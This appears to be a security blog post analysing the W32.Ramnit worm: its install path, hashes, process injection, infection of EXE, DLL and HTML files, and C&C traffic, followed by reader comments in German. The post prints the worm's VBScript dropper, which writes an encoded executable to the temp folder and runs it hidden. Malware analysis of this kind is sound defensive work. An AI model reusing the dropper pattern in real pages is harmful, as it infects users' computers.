Quick Analysis Of W32.Ramnit (aka DesktopLayer.exe)

Recently I came across a malware sample which have made some suspicious network activity to a domain called zahlung.name. The domain name looks very suspicious (German word for “payment”) so I decided to take a closer look at the sample.

The Malware which I will talking about in this post is a Worm called W32.Ramnit. The Worm was first discovered in 2010 (in January by Synamtec and in August by McAfee).

*** Worm W32.Ramnit ***
Let’s take a quick look at the behavior of Ramnit. The Worm always installs itself into the same directory using the same filename:

C:\Program Files\Microsoft\DesktopLayer.exe

In this case the file has a very bad AV detection rate:

Filename: DesktopyLayer.exe
MD5: 8746774d1033048dcdc6f82ffaffd80d
SHA1: 142fca53e1ffd6b40803d7989417fd6e4fbab1b4
File size: 51’200 bytes
VT Result: 3 /43 (7.0%)

After the Worm infected the computer, it starts iexplore.exe in a invisible mode and injects itself into the process. In this way the Worm is able to bypass the local Firewall and communicate with it’s Command&Control Server (C&C).

As soon as the computer is infected, the Worm starts to spread itself by infecting all files on the victim’s computer which have the file extension EXE, DLL or HTML. For example, if Quick Time Player is installed on the victim’s computer the Worm will automatically search thru the directory and infecting the EXE, DLL and HTML files. Below is a screenshort of a clean systems (before the infection):

Followed by a screenshot of a infected system (same directory):

Note that the file size and date modified of the infected files has changed. The same goes for other directories with EXE, DLL or HTML files for example the Adobe Reader directory (before the infection):

And after infection:

Let’s compare the original (clean) files with the infected files which has been patched by Worm Ramnit:

*** QTTask.exe (Quick Time) ***
* MD5: 6df76965a0fb8237e9c3b3cab9815ec2
* File size: 413’696 bytes
* VT result: 0/41 (0.0%)

* MD5: c32b6f477c5454d4e2cded81e686036d
* File size: 466’944 bytes
* VT result: 38/42 (90.5%)

*** AGM.dll (Adobe Reader) ***
* MD5: 8f0b2030b5e42235c855a94a17f57118
* File size: 4’883’456 bytes
* VT result: 0/41 (0.0%)

* MD5: 833c79d662f8cc47579540dc03505419
* File size: 4’936’192 bytes
* VT result: 39/43 (90.7%)

As shown on Virustotal, the files which have been infected by the Worm are pretty good detected by most of the AV engines.

If we take a closer look into a infected HTML file we will see that the Worm has added a VB-Script at the end of the file:

<script type='text/javascript'>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000[...]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("
&H" & Mid(WriteData,i,2)))
End If
Set WSHshell = CreateObject("
WSHshell.Run DropPath, 0

If a user runs the HTML file, the VB-Script will drop a file called “svchost.exe” and infect the computer.

*** C&C Communication ***
The Worm is using it’s own proprietary protocol to communicate with the C&C server on port 443 (which is normally HTTPs). Since August 2010 I’ve seen three different domain names which are being used by Worm Ramnit:

I’ve Google for all three domain names and I haven’t found any evidence which would show that these domain names are malicious. But of course they are. Unfortunately, if we lookup those domain names on URLVoid it won’t look better:

It’s a pretty good example that sometimes the AV industry fails.

*** How the Worm spread itself ***
Worm Ramnit uses several ways to spread itself and infect other computers:

  • Drive-By exploits
  • Infecting EXE, DLL and HTML files on the victims computer
  • Infecting removable medium including USB Stick, USB Harddrives and CDs

*** Conclusion ***
Due to the fact, that the Worm installs itself always as “DesktopLayer.exe”, it shouldn’t be to hard to identify infected systems. If you Google for “DesktopLayer.exe” you will see over 30’000 hits including users who complaining about the file “DesktopLayer.exe” which they just found on their computer. So it looks like the Worm is already pretty wide spreaded.

As already mentioned before, the Worm has various methods how he can spread itself. Mainly worms are a big problem for large networks (like coperate or governmental networks): If you have one infected computer the Worm will spread quickly within your network by infecting removable drivers or files one networks shares.

The mentioned C&C domain names which are associated with Worm Ramnit are already listed on AMaDa. Therefore you can use the AMaDa C&C Domain Blocklist to block C&C traffic or identify infected systems in your network.

3 thoughts on “Quick Analysis Of W32.Ramnit (aka DesktopLayer.exe)

  1. Neo


    So wie ich das verstehe, braucht dieses Java Script gar keine Brower Lücke auszuneutzen oder sehe ich das falsch?

    Gruss Neo

  2. admin Post author

    Hallo Neo

    Nein, das VB-Script nützt keine Sicherheitslücke im Browser aus. Das VB-Script schreibt die Datei mittels der Funktion “CreateObject”.


  3. Paul


    The Worm is using it’s own proprietary protocol to communicate with the C&C server on port 443 (which is normally HTTPs).

    Kann diese Kommunikation mit einem HTTPS-Proxy (Websense/Webwasher/Blucoat/Squid+SSLDump etc.) oder einer DPI-fähigen Firewall geblockt werden?

    Wo kann man pcaps (Netzwerktraces) der C&C-Traffic von verschiedener Malware-Bots finden?


Leave a Reply

Your email address will not be published. Required fields are marked *